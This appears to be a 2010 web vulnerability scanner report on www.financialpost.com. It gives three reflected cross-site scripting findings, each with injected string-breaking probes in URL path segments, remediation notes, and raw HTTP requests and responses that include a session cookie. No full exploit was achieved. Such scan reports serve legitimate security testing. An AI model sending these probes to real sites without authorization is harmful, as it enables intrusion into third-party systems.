HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 83722 Expires: Sun, 19 Dec 2010 03:10:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-financea3bd2';4a915ea03ce/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-financea3bd2';4a915ea03ce;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34415371?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55b32'%3b7da1471c85e was submitted in the REST URL parameter 3. This input was echoed as 55b32';7da1471c85e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Retired+forgotten/395308855b32'%3b7da1471c85e/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 69813 Expires: Sun, 19 Dec 2010 03:11:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/retired-forgotten/395308855b32';7da1471c85e/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=retired-forgotten;kw=395308855b32';7da1471c85e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70920 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4833e'%3bb4e5a632b37 was submitted in the REST URL parameter 4. This input was echoed as 4833e';b4e5a632b37 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Retired+forgotten/3953088/4833e'%3bb4e5a632b37 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44021
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13e57'%3bca94ef828cc was submitted in the REST URL parameter 1. This input was echoed as 13e57';ca94ef828cc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance13e57'%3bca94ef828cc/Warning+Asset+bubbles+underway/3976343/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 82115 Expires: Sun, 19 Dec 2010 03:11:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance13e57';ca94ef828cc/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance13e57';ca94ef828cc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=93912031?"> ...[SNIP]...